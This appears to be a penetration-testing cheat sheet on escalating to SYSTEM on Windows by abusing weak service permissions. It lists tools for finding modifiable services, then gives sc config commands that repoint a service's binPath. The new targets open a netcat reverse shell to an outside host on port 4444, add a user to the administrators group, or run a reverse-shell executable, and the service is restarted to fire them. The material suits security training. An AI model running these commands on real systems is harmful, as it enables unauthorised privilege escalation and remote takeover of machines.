Weak Service Permissions

MITRE ATT&CK™ Hijack Execution Flow - Technique T1574

Theory

It is very often in Windows environments to discover services that run with SYSTEM privileges. If you have permissions over the service you can use it to escalate you privileges.

Practice

If we have enough permissions over a service, we can edit the binPath parameters and replace it with our own binary or command.

If you have SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS permissions, you can replace the binary.

AccessChk

We can use AccessChk from sysinternals tools to enumerate permissions over services.

#list all the services that a specific user can modify.
accesschk64.exe -uwcqv "pwned" * -accepteula
accesschk64.exe -uwcqv "Authenticated Users" * -accepteula
accesschk64.exe -uwcqv "BUILTIN\Users" * -accepteula
accesschk.exe -uwcqv %USERNAME% * -accepteula

#list permissions for "VulnSvc" service.
accesschk64.exe -uwcqv VulnSvc -accepteula

PowerUp

This cmdlet from PowerUp can also be used.

. .\PowerUp.ps1
Get-ModifiableService

winPEAS

Or, we may use the servicesinfo module of WinPeas.

winPEASx64.exe servicesinfo

We can edit the binpath parameter with following commands

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config <Service_Name> binpath= "C:\Documents and Settings\PEPE\reverseShell.exe"

And then, restart the service

#Using wmic
wmic service <Service_Name> call stopservice
wmic service <Service_Name> call startservice

#Using net
net stop <Service_Name> && net start <Service_Name>

#Using sc.exe
sc stop <Service_Name>
sc start <Service_Name>

Resources

PayloadsAllTheThings/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Last updated 1 year ago